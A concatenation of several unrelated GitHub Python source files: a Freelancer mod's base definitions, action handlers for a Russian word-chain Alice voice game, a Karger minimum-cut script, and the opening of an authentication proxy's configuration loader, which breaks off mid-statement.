LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# Solar plant\nclass rh_ber_03_Base(Base):\n NAME = 'rh_ber_03_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandShieldgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Junker Freeport\nclass rh_ber_04_Base(Base):\n NAME = 'rh_ber_04_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Hessian outpost\nclass rh_ber_05_Base(Base):\n NAME = 'rh_ber_05_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHessiangun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Police\nclass rh_ber_06_Base(Base):\n NAME = 'rh_ber_06_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# ALG ?\nclass rh_ber_07_Base(Base):\n NAME = 'rh_ber_07_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Junkers\nclass rh_ber_08_Base(Base):\n NAME = 'rh_ber_08_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Rheinland miner\nclass sig13_01_Base(Base):\n NAME = 'sig13_01_Base'\n SYSTEM = sig13\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Liberty miner\nclass sig13_02_Base(Base):\n NAME = 'sig13_02_Base'\n SYSTEM = sig13\n\n\nclass sig13_03_Base(Base):\n NAME = 'sig13_03_Base'\n SYSTEM = sig13\n\n\nclass li_cal_01_Base(Base):\n NAME = 'li_cal_01_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_02_Base(Base):\n NAME = 'li_cal_02_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_03_Base(Base):\n NAME = 'li_cal_03_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_04_Base(Base):\n NAME = 'li_cal_04_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_05_Base(Base):\n NAME = 'li_cal_05_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_06_Base(Base):\n NAME = 'li_cal_06_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_07_Base(Base):\n NAME = 'li_cal_07_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_08_Base(Base):\n NAME = 'li_cal_08_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_09_Base(Base):\n NAME = 'li_cal_09_Base'\n SYSTEM = li_cal\n\n\nclass sig22_01_Base(Base):\n NAME = 'sig22_01_Base'\n SYSTEM = sig22\n\n\nclass sig22_02_Base(Base):\n NAME = 'sig22_02_Base'\n SYSTEM = sig22\n\n\nclass sig22_04_Base(Base):\n NAME = 'sig22_04_Base'\n SYSTEM = sig22\n\nclass sig42_01_Base(Base):\n NAME = 'sig42_01_Base'\n SYSTEM = sig42\n\n\nclass sig42_02_Base(Base):\n NAME = 'sig42_02_Base'\n SYSTEM = sig42\n\n\nclass li_mnh_01_Base(Base):\n NAME = 'li_mnh_01_Base'\n SYSTEM = li_mnh\n SHIPS = [\n # Piranha2,\n # Barracuda2,\n # Rhino2,\n ]\n\n\nclass li_mnh_02_Base(Base):\n NAME = 'li_mnh_02_Base'\n SYSTEM = li_mnh\n SHIPS = [\n # Dromader2,\n ]\n\n\nclass li_mnh_03_Base(Base):\n NAME = 'li_mnh_03_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_04_Base(Base):\n NAME = 'li_mnh_04_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_05_Base(Base):\n NAME = 'li_mnh_05_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_06_Base(Base):\n NAME = 'li_mnh_06_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_07_Base(Base):\n NAME = 'li_mnh_07_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_09_Base(Base):\n NAME = 'li_mnh_09_Base'\n SYSTEM = li_mnh\n\n\nclass li_for_01_Base(Base):\n NAME = 'li_for_01_Base'\n SYSTEM = li_for\n SHIPS = [\n Startracker,\n Starblazer,\n CSV_Mk2,\n ]\n\nclass li_for_02_Base(Base):\n NAME = 'li_for_02_Base'\n SYSTEM = li_for\n\n\nclass li_for_03_Base(Base):\n NAME = 'li_for_03_Base'\n SYSTEM = li_for\n\n\nclass li_for_04_Base(Base):\n NAME = 'li_for_04_Base'\n SYSTEM = li_for\n\n\nclass li_for_05_Base(Base):\n NAME = 'li_for_05_Base'\n SYSTEM = li_for\n\n\nclass li_for_06_Base(Base):\n NAME = 'li_for_06_Base'\n SYSTEM = li_for\n\n\nclass sig17_01_Base(Base):\n NAME = 'sig17_01_Base'\n SYSTEM = sig17\n\n\nclass sig17_02_Base(Base):\n NAME = 'sig17_02_Base'\n SYSTEM = sig17\n\n\nclass sig17_03_Base(Base):\n NAME = 'sig17_03_Base'\n SYSTEM = sig17\n\nclass sig17_04_Base(Base):\n NAME = 'sig17_04_Base'\n SYSTEM = sig17\n\nclass li_col_01_Base(Base):\n NAME = 'li_col_01_Base'\n SYSTEM = li_col\n\n\nclass li_col_02_Base(Base):\n NAME = 'li_col_02_Base'\n SYSTEM = li_col\n\n\nclass li_col_03_Base(Base):\n NAME = 'li_col_03_Base'\n SYSTEM = li_col\n\n\nclass li_col_04_Base(Base):\n NAME = 'li_col_04_Base'\n SYSTEM = li_col\n\n\nclass li_col_06_Base(Base):\n NAME = 'li_col_06_Base'\n SYSTEM = li_col\n\n\nclass li_col_07_Base(Base):\n NAME = 'li_col_07_Base'\n SYSTEM = li_col\n\n\nclass Tau31_01_Base(Base):\n NAME = 'Tau31_01_Base'\n SYSTEM = tau31\n\n\nclass Tau31_02_Base(Base):\n NAME = 'Tau31_02_Base'\n SYSTEM = tau31\n\n\nclass Tau31_03_Base(Base):\n NAME = 'Tau31_03_Base'\n SYSTEM = tau31\n\n\nclass br_wrw_01_Base(Base):\n NAME = 'br_wrw_01_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_02_Base(Base):\n NAME = 'br_wrw_02_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_03_Base(Base):\n NAME = 'br_wrw_03_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_04_Base(Base):\n NAME = 'br_wrw_04_Base'\n SYSTEM = br_wrw\n\n\nclass Tau37_01_Base(Base):\n NAME = 'Tau37_01_Base'\n SYSTEM = tau37\n\n\nclass Tau37_02_Base(Base):\n NAME = 'Tau37_02_Base'\n SYSTEM = tau37\n\nclass Tau37_03_Base(Base):\n NAME = 'Tau37_03_Base'\n SYSTEM = tau37\n\nclass Tau37_04_Base(Base):\n NAME = 'Tau37_04_Base'\n SYSTEM = tau37\n\n\nclass Tau29_01_Base(Base):\n NAME = 'Tau29_01_Base'\n SYSTEM = tau29\n\n\nclass Tau29_02_Base(Base):\n NAME = 'Tau29_02_Base'\n SYSTEM = tau29\n\n\nclass Tau29_03_Base(Base):\n NAME = 'Tau29_03_Base'\n SYSTEM = tau29\n\nclass br_cam_01_Base(Base):\n NAME = 'br_cam_01_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_02_Base(Base):\n NAME = 'br_cam_02_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_03_Base(Base):\n NAME = 'br_cam_03_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_04_Base(Base):\n NAME = 'br_cam_04_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_05_Base(Base):\n NAME = 'br_cam_05_Base'\n SYSTEM = br_cam\n\n\nclass br_avl_01_Base(Base):\n NAME = 'br_avl_01_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_02_Base(Base):\n NAME = 'br_avl_02_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_03_Base(Base):\n NAME = 'br_avl_03_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_04_Base(Base):\n NAME = 'br_avl_04_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_06_Base(Base):\n NAME = 'br_avl_06_Base'\n SYSTEM = br_avl\n\n\nclass Tau23_01_Base(Base):\n NAME = 'Tau23_01_Base'\n SYSTEM = tau23\n\n\nclass Tau23_02_Base(Base):\n NAME = 'Tau23_02_Base'\n SYSTEM = tau23\n\n\nclass Tau23_03_Base(Base):\n NAME = 'Tau23_03_Base'\n SYSTEM = tau23\n\n\nclass Tau23_04_Base(Base):\n NAME = 'Tau23_04_Base'\n SYSTEM = tau23\n\n\nclass Tau23_m7_Base(Base):\n NAME = 'Tau23_m7_Base'\n SYSTEM = tau23\n\n\n\nclass ku_ksu_01_base(Base):\n NAME = 'ku_ksu_01_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_02_base(Base):\n NAME = 'ku_ksu_02_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_03_base(Base):\n NAME = 'ku_ksu_03_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_04_base(Base):\n NAME = 'ku_ksu_04_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_05_base(Base):\n NAME = 'ku_ksu_05_base'\n SYSTEM = ku_ksu\n\n\nclass tau4_01_base(Base):\n NAME = 'tau4_01_base'\n SYSTEM = tau4\n\n\nclass tau4_02_base(Base):\n NAME = 'tau4_02_base'\n SYSTEM = tau4\n\n\nclass tau4_03_base(Base):\n NAME = 'tau4_03_base'\n SYSTEM = tau4\n\n\nclass tau4_04_base(Base):\n NAME = 'tau4_04_base'\n SYSTEM = tau4\n\n\nclass ku_hns_01_base(Base):\n NAME = 'ku_hns_01_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_02_base(Base):\n NAME = 'ku_hns_02_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_03_base(Base):\n NAME = 'ku_hns_03_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_04_base(Base):\n NAME = 'ku_hns_04_base'\n SYSTEM = ku_hns\n\n\nclass ku_tgk_01_base(Base):\n NAME = 'ku_tgk_01_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_02_base(Base):\n NAME = 'ku_tgk_02_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_03_base(Base):\n NAME = 'ku_tgk_03_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_04_base(Base):\n NAME = 'ku_tgk_04_base'\n SYSTEM = ku_tgk\n\n\nclass ku_hkd_01_base(Base):\n NAME = 'ku_hkd_01_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_02_base(Base):\n NAME = 'ku_hkd_02_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_03_base(Base):\n NAME = 'ku_hkd_03_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_06_base(Base):\n NAME = 'ku_hkd_06_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_07_base(Base):\n NAME = 'ku_hkd_07_base'\n SYSTEM = ku_hkd\n\n\nclass om7_01_base(Base):\n NAME = 'om7_01_base'\n SYSTEM = om7\n\n\nclass om7_02_base(Base):\n NAME = 'om7_02_base'\n SYSTEM = om7\n\n\nclass om7_03_base(Base):\n NAME = 'om7_03_base'\n SYSTEM = om7\n\n\nclass co_cur_01_base(Base):\n NAME = 'co_cur_01_base'\n SYSTEM = co_cur\n\n\nclass co_cur_02_base(Base):\n NAME = 'co_cur_02_base'\n SYSTEM = co_cur\n\n\nclass om2_01_base(Base):\n NAME = 'om2_01_base'\n SYSTEM = omicron2\n\n\nclass om2_03_base(Base):\n NAME = 'om2_03_base'\n SYSTEM = omicron2\n\n\nclass om2_04_base(Base):\n NAME = 'om2_04_base'\n SYSTEM = omicron2\n\n\nclass om1_01_base(Base):\n NAME = 'om1_01_base'\n SYSTEM = omicron1\n\n\nclass tau26_01_base(Base):\n NAME = 'tau26_01_base'\n SYSTEM = tau26\n\n\nclass tau26_02_base(Base):\n NAME = 'tau26_02_base'\n SYSTEM = tau26\n\n\nclass up1_01_base(Base):\n NAME = 'up1_01_base'\n SYSTEM = upsilon1\n\n\nclass up1_02_base(Base):\n NAME = 'up1_02_base'\n SYSTEM = upsilon1\n\n\nclass up1_03_base(Base):\n NAME = 'up1_03_base'\n SYSTEM = upsilon1\n\n\nclass co_mad_01_base(Base):\n NAME = 'co_mad_01_base'\n SYSTEM = co_mad\n\n\nclass co_mad_03_base(Base):\n NAME = 'co_mad_03_base'\n SYSTEM = co_mad\n\n\nclass co_val_01_base(Base):\n NAME = 'co_val_01_base'\n SYSTEM = co_val\n\n\nclass om11_01_base(Base):\n NAME = 'om11_01_base'\n SYSTEM = om11\n\n\nclass om11_02_base(Base):\n NAME = 'om11_02_base'\n SYSTEM = om11\n\nclass om11_03_base(Base):\n NAME = 'om11_03_base'\n SYSTEM = om11\n\nclass om11_04_base(Base):\n NAME = 'om11_04_base'\n SYSTEM = om11\n\n\nclass co_och_01_base(Base):\n NAME = 'co_och_01_base'\n SYSTEM = co_och\n\n\nclass co_och_02_base(Base):\n NAME = 'co_och_02_base'\n SYSTEM = co_och\n\n\nclass co_och_04_base(Base):\n NAME = 'co_och_04_base'\n SYSTEM = co_och\n\n\nclass up2_01_base(Base):\n NAME = 'up2_01_base'\n SYSTEM = upsilon2\n\nclass up2_02_base(Base):\n NAME = 'up2_02_base'\n SYSTEM = upsilon2\n\nclass up2_03_base(Base):\n NAME = 'up2_03_base'\n SYSTEM = upsilon2\n\n\nclass up2_05_base(Base):\n NAME = 'up2_05_base'\n SYSTEM = upsilon2\n\n\nclass co_cad_01_base(Base):\n NAME = 'co_cad_01_base'\n SYSTEM = co_cad\n\n\nclass co_cad_02_base(Base):\n NAME = 'co_cad_02_base'\n SYSTEM = co_cad\n\n\nclass co_cad_03_base(Base):\n NAME = 'co_cad_03_base'\n SYSTEM = co_cad\n\n\nclass co_cad_04_base(Base):\n NAME = 'co_cad_04_base'\n SYSTEM = co_cad\n\n\nclass om13_01_Base(Base):\n NAME = 'om13_01_Base'\n SYSTEM = om13\n\n\nclass om13_02_Base(Base):\n NAME = 'om13_02_Base'\n SYSTEM = om13\n\n\nclass br_uls_01_base(Base):\n NAME = 'br_uls_01_base'\n SYSTEM = br_uls\n\n\nclass br_uls_02_base(Base):\n NAME = 'br_uls_02_base'\n SYSTEM = br_uls\n","repo_name":"Jeider/freelancer_nomad_legacy","sub_path":"Assets/Pythonlancer/universe/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19354,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"5935176626","text":"from typing import Type\n\nfrom core.stats_storage import UserStats\nfrom settings import *\nfrom core.utils import get_nouns, is_equal_seq_words2\nfrom core.words_source import get_random_word\nfrom .models import *\n\n\nasync def new_session_new_user(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Проверка условия: запуск навыка новым игроком\n \"\"\"\n if (await stats.user_name == '') and not (await stats.games_count):\n await stats.log_session()\n return True\n return False\n\n\nasync def new_session_friend(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Проверка условия: запуск навыка Другом - игроком, имя которого известно\n Если условие выполняется - добавляем имя пользователя в список игроков\n \"\"\"\n un = await stats.user_name\n if un != '':\n game.users_clear_all()\n game.users_append_new(un)\n await stats.log_session()\n return True\n return False\n\n\nasync def new_session_unknown_friend(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Проверка условия: запуск навыка Другом - игроком, имя которого известно\n \"\"\"\n if await stats.games_count:\n await stats.log_session()\n return True\n return False\n\n\nasync def start_new_game(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Начинаем новую игру\n \"\"\"\n game.start_game()\n game.game_process.player_say(get_random_word())\n await stats.log_new_game()\n return True\n\n\nasync def a_game_set_player_name(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Установка имени пользователя.\n Имя пользователя берется не из \"Сущностей\" (nlu) входящего запроса, а определяется путем разбора значения\n поля Пользовате��ьский запрос (original_utterance). Эта необходимость обусловлена тем, что при разработке навыка\n нет возможности использовать nlu результат.\n \"\"\"\n value = get_nouns(alice_request.request.original_utterance)\n if isinstance(value, list) and len(value) > 0:\n value = value[0].capitalize()\n if len(value) > 0:\n game.users_clear_all()\n game.users_append_new(value)\n await stats.log_user_name(value)\n return True\n return False\n\n\nasync def set_friend_name(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Установка имени пользователя.\n Имя пользователя берется не из \"Сущностей\" (nlu) входчщего запроса, а определяется путем разбора значения\n поля Пользовательский запрос (original_utterance). Эта необходимость обусловлена тем, что при разработке навыка\n нет возможности использовать nlu результат.\n \"\"\"\n value = get_nouns(alice_request.request.original_utterance)\n if isinstance(value, list) and len(value) > 0:\n value = value[0].capitalize()\n if len(value) > 0:\n await stats.log_user_name(value)\n return True\n return False\n\n\nasync def game_process_need_repeat(alice_request, game, *args):\n \"\"\"\n Проверка условия: поступившие данные не могут быть идентифицированы как ожидаемая последоватлеьность слов.\n В этом случае необходимо попросить пользователя повторить ввод.\\\n Ситуация имеет место быть, когда было \"захвачено\" сказанное другим человеком и/или было адресовано не \"Алисе\"\n Если условие выполняется - сообщаем о непонимании )\n \"\"\"\n if alice_request.request.original_utterance == '':\n return True\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if not is_ok and ((diff > DIFFERENT_MAX_DIST) or diff == 0):\n return True\n return False\n\n\nasync def a_game_process_user_lost(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Проверка условия: пользователь допустил ошибку в последоватльности слов.\n Если условие выполняется - пользователь считается проигравшим.\n \"\"\"\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n\n if not is_ok:\n await stats.log_game_lost()\n return True\n\n # Тут важный момент: т.к. нижеследующие функции могут быть выполнены только если пользователь НЕ совершил ошибку,\n # мы выполняем сохранение слова кожаного игрока и генерируем слова бота (т.е. фактически совершаем ход бота)\n game.game_process.player_say(word)\n game.game_process.player_say(get_random_word())\n await stats.log_word(word)\n return False\n\n\nasync def a_game_process_user_won(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n \"\"\"\n Проверка условия: количество слов в последовательности больше максимального (заранее определенного значения)\n Если условие выполняется - пользователь считается победителем.\n \"\"\"\n # todo-доработать: вместо константы A_GAME_MAX_WORDS_COUNT должен быть пред. макс. результат пользователя...\n # Но в целом нужно подумать над ситуацией, когда взрослый пользователь даст играть ребенку. Возможно имеет смысл\n # сбрасывать значение до количества слов при проигреше.\n if len(game.game_process.words) >= A_GAME_MAX_WORDS_COUNT:\n await stats.log_game_won()\n return True\n return False\n\n\nasync def a_game_process_half_game(alice_request, game, *args):\n \"\"\"\n Проверка условия: количество слов в последовательности равно половине от максимального\n (заранее определенного значения)\n \"\"\"\n if len(game.game_process.words) in [A_GAME_HALF_GAME, A_GAME_HALF_GAME + 1]:\n return True\n return False\n\n\nasync def b_game_player_names(alice_request, game, *args):\n \"\"\"\n Ввод имен игроков.\n Проверка условия: введено не менее 2х действительных имен\n \"\"\"\n value = get_nouns(alice_request.request.original_utterance)\n if len(value) < 2:\n return False\n game.users.clear()\n game.users.extend([i.capitalize() for i in value])\n return True\n\n\nasync def b_game_process_last_player_lost(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок допустил ошибку и он единственный игрок\n Игра завершается, победил бот.\n \"\"\"\n if len(game.game_process.players) != 2:\n return False\n\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if not is_ok:\n game.game_process.current_player_do_lost()\n return True\n return False\n\n\n# Следующий ход бота и пользователь не допустил ошибку - выиграл и пользователь единственный игрок\nasync def b_game_process_last_player_won(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок НЕ допустил ошибку И он единственный игрок И достигнут лимит слов\n Игра завершается, победил игрок.\n \"\"\"\n if len(game.game_process.players) != 2:\n return False\n\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if is_ok and len(game.game_process.words) >= B_GAME_MAX_WORDS_COUNT:\n return True\n return False\n\n\nasync def b_game_process_player_lost_next_bot(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок допустил ошибку И текущий ход бота\n Бот называет слово, переход хода к след. игроку.\n \"\"\"\n if not game.game_process.next_player.is_bot:\n return False\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if not is_ok:\n game.game_process.current_player_do_lost()\n game.game_process.player_say(get_random_word())\n return True\n return False\n\n\nasync def b_game_process_one_player_left(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок НЕ допустил ошибку И он единственный игрок\n Бот называет слово, переход хода к след. игроку.\n \"\"\"\n if not game.game_process.next_player.is_bot:\n return False\n if len(game.game_process.players) != 2:\n return False\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if is_ok:\n game.game_process.player_say(word)\n game.game_process.player_say(get_random_word())\n return True\n return False\n\n\nasync def b_game_process_next_bot(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок НЕ допустил ошибку И текущий ход бота\n Бот называет слово, переход хода к след. игроку.\n \"\"\"\n if not game.game_process.next_player.is_bot:\n return False\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if is_ok:\n game.game_process.player_say(word)\n game.game_process.player_say(get_random_word())\n return True\n return False\n\n\nasync def b_game_process_player_lost_next_player(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок допустил И следующих ход др. игрока (не бота)\n \"\"\"\n if game.game_process.next_player.is_bot:\n return False\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if not is_ok:\n game.game_process.current_player_do_lost()\n return True\n return False\n\n\nasync def b_game_process_next_player(alice_request, game, *args):\n \"\"\"\n Проверка условия: Игрок не допустил И следующих ход др. игрока (не бота)\n \"\"\"\n if game.game_process.next_player.is_bot:\n return False\n is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n if is_ok:\n game.game_process.player_say(word)\n return True\n return False\n","repo_name":"x6b726173/alice-word-by-word","sub_path":"word_by_word/core/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16079328029","text":"import random\r\n\r\ndef checkSelfLoops(checkDict):\r\n\tfor key in checkDict:\r\n\t\tcheckDict[key] = [y for y in checkDict[key] if y != key]\r\n\treturn checkDict\r\n\r\ndef replaceItem(lst, itemIn, itemOut):\r\n\tfor i in range(len(lst)):\r\n\t\tif lst[i] == itemOut:\r\n\t\t\tlst[i] = itemIn\r\n\treturn lst\r\n\r\ndef permutDict(checkDict, vertIn, vertOut):\r\n\tcheckDict[vertIn].extend(checkDict[vertOut])\r\n\tfor item in checkDict[vertOut]:\r\n\t\tif item != vertOut:\r\n\t\t\tcheckDict[item] = replaceItem(checkDict[item], vertIn, vertOut)\r\n\tcheckSelfLoops(checkDict)\r\n\tcheckDict.pop(vertOut)\r\n\treturn checkDict\r\n\r\n\r\ndef min_cut(inp):\r\n\twhile (len(inp.keys()) > 2):\r\n\t\trandomEdge_1 = random.choice(list(inp.keys()))\r\n\t\trandomEdge_2 = random.choice(inp[randomEdge_1])\r\n\t\tinp = permutDict(inp, randomEdge_1, randomEdge_2)\r\n\treturn inp\r\n\r\n\r\nf = open('kargerMinCut.txt', 'r')\r\nlst = f.readlines()\r\nfor i in range(len(lst)):\r\n\tlst[i] = lst[i].split()\r\n\tfor j in range(len(lst[i])):\r\n\t\tlst[i][j] = int(lst[i][j])\r\n\r\nmyDict = {}\r\n\r\nfor i in range(len(lst)):\r\n\tmyDict[i + 1] = lst[i]\r\n\r\ndict1 = myDict.copy()\r\ndict1 = min_cut(dict1)\r\nlength = len(dict1[list(dict1.keys())[1]])\r\nprint(length)\r\n\r\nf.close()\t","repo_name":"Quoly/Algorithms_from_Coursera","sub_path":"Week 3/minimum_cut.py","file_name":"minimum_cut.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22225168242","text":"#\n# Handle ini file configuration\n#\nfrom const import *\nimport os.path\nimport srvio\nimport configparser\nimport sys\nimport login_form\nimport ticket, ipsess\nimport tlrealms, flatfiles\nimport ipacl\n\ncfg = {\n CF_LISTEN: '0.0.0.0',\n CF_PORT: 8080,\n CF_LOG: LOG_SYSLOG,\n CF_LOG_EX: APP_NAME,\n CF_PROVIDERS: {},\n CF_COOKIE_NAME: 'autonom_goo6Chah',\n CF_SESSION_SIG: 'uuChah2eigahthai5OeGhuz3Cieshahc',\n CF_TICKET_MAXAGE: 86400 * 365,\n CF_COOKIE_MAXAGE: 86400 * 10,\n CF_COOKIE_RENEW: 86400 * 7,\n CF_ATIME_MIN: 3600*4,\n CF_IPLOGIN_MAXAGE: 3600,\n CF_TEMPLATE_PATH: os.path.dirname(__file__) + '/views',\n CF_DOCROOT: os.path.dirname(__file__) + '/static',\n CF_TICKET_DB: 'autonom-tix.db',\n CF_FIXED_IP_LIST: None,\n CF_PROXY_LIST: None,\n CF_PROXY_PSK: None,\n CF_AUTH_REALM: None,\n CF_PWCK: None,\n RT_SESSION_MGR: {},\n CF_BACKENDS: {},\n}\n\ndef return_false(c,k,v):\n return False\n\n\ndef copy_settings(src,dst,cfgparse=return_false,srcdesc='config section'):\n for key in src:\n if key in dst:\n if cfgparse(dst,key,src):\n continue\n elif isinstance(dst[key],int):\n dst[key] = src.getint(key)\n elif isinstance(dst[key],float):\n dst[key] = src.getfloat(key)\n elif isinstance(dst[key],bool):\n dst[key] = src.getboolean(key)\n elif isinstance(dst[key],str) or dst[key] is None:\n dst[key] = src[key]\n else:\n sys.stderr.write('Unconfigurable key {key} in {srcdesc}\\n'.format(\n key=key, srcdesc=srcdesc))\n else:\n sys.stderr.write('key {key} does not exist in {srcdesc}\\n'.format(\n key=key, srcdesc=srcdesc))\n\ndef cfg_main_parser(dst,key,src):\n if key == CF_LOG:\n # Handle log specification specially\n if src[key] is None:\n dst[CF_LOG] = LOG_STDIO\n dst[CF_LOG_EX] = None\n elif src[key].lower().startswith('file:'):\n dst[CF_LOG] = LOG_FILE\n dst[CF_LOG_EX] = src[key][5:]\n elif src[key].lower().startswith('syslog:'):\n dst[CF_LOG] = LOG_SYSLOG\n dst[CF_LOG_EX] = src[key][7:]\n elif src[key].lower() == 'syslog':\n dst[CF_LOG] = LOG_SYSLOG\n dst[CF_LOG_EX] = APP_NAME\n elif src[key].lower() == 'stdio':\n dst[CF_LOG] = LOG_STDIO\n elif src[key] != '':\n dst[CF_LOG] = LOG_FILE\n dst[CF_LOG_EX] = log\n else:\n dst[CF_LOG] = LOG_STDIO\n dst[CF_LOG_EX] = None\n return True\n return False\n\n\ndef cfg_init(args):\n if os.path.isfile(args.config):\n # If not daemon, switch default logging to stdio\n if not args.daemonize: cfg[CF_LOG] = LOG_STDIO\n\n #\n # Configure from file\n #\n ini = configparser.ConfigParser(allow_no_value=True)\n ini.read(args.config)\n copy_settings(ini[APP_NAME], cfg, cfg_main_parser, 'configuration file main section')\n\n for ss in ini:\n if ss == APP_NAME or ss == CF_DEFAULT: continue\n\n if CF_PROVIDER in ini[ss]:\n #\n # Configure a login provider\n #\n if ini[ss][CF_PROVIDER] == login_form.NAME:\n provider = login_form\n else:\n sys.stderr.write('Unknown provider {prov} in {sect}\\n'.format(\n prov=ini[ss][CF_PROVIDER], sect=ss))\n continue\n\n cfg[CF_PROVIDERS][ss] = provider.DEFAULTS\n\n cfg[CF_PROVIDERS][ss][CF_PROVIDER] = ini[ss][CF_PROVIDER]\n cfg[CF_PROVIDERS][ss][CF_ID] = ss\n cfg[CF_PROVIDERS][ss][CF_MODULE] = provider\n\n if hasattr(provider, 'cfgparse'):\n cfgparse = provider.cfgparse\n else:\n cfgparse = return_false\n\n copy_settings(ini[ss],cfg[CF_PROVIDERS][ss],cfgparse,'provider {sect}'.format(sect=ss))\n\n continue\n\n if CF_BACKEND in ini[ss]:\n #\n # Configure a password backend\n #\n if ini[ss][CF_BACKEND] == tlrealms.NAME:\n backend = tlrealms\n elif ini[ss][CF_BACKEND] == flatfiles.NAME:\n backend = flatfiles\n else:\n sys.stderr.write('Unknown backend {backend} in {sect}\\n'.format(\n backend=ini[ss][CF_BACKEND], 